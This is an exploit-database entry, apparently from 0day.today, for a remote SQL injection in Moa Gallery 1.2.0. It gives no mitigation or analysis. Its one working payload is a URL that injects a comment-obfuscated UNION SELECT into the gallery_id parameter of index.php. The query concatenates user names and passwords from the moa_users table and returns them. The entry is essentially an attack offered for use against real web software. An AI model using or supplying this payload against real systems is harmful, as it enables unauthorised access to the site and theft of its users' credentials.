id: 5696
date: 08/25/2009
title: Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability
author: Mr.SQL
cves: 

================================================================
Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability
================================================================

###############################################################
## Remote SQL Injection Vulnerability ( index.php action )
##
## Moa Gallery 1.2.0
##
## www.moagallery.net
##
###############################################################
##
## -[[: Exploite :]]-
##
## www.TraGeT.CoM/index.php?action=gallery_view&gallery_id=-1/**/union/**/select/**/concat_ws(0x3a,name,password)/**/from/**/moa_users/*
##
########################
########################




#  0day.today [2023-03-24]  #